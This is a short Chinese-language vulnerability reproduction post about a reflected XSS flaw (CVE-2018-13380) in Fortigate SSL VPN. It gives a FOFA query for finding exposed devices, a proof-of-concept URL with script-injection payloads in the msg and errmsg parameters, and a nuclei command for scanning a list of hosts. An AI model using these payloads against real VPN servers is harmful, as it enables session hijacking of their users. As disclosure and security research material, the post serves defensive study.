0x01 漏洞描述
Fortinet将其SSL VPN产品线称为Fortigate SSL VPN,主要应用于最终用户以及中型企业。目前互联网上这些服务器的数量已超过48万台,主要集中在亚洲及欧洲区域。FortinetSSL VPN系统存在xss漏洞,攻击者通过漏洞可以劫持用户会话等操作。
0x02 漏洞复现
fofa:app="FORTINET-SSLVPN"
1.执行POC,弹出1377
/message?title=x&msg=%26%23%3Csvg/onload=alert(1337)%3E%3B/remote/error?errmsg=ABABAB--%3E%3Cscript%3Ealert(1337)%3C/script%3E
2.nuclei验证脚本修改版本已发布知识星球
nuclei.exe -t CVE-2018-13380.yaml -l subs.txt -stats
原文始发于微信公众号(融云攻防实验室):漏洞复现 Fortigate SSL VPN msg/errmsg xss漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论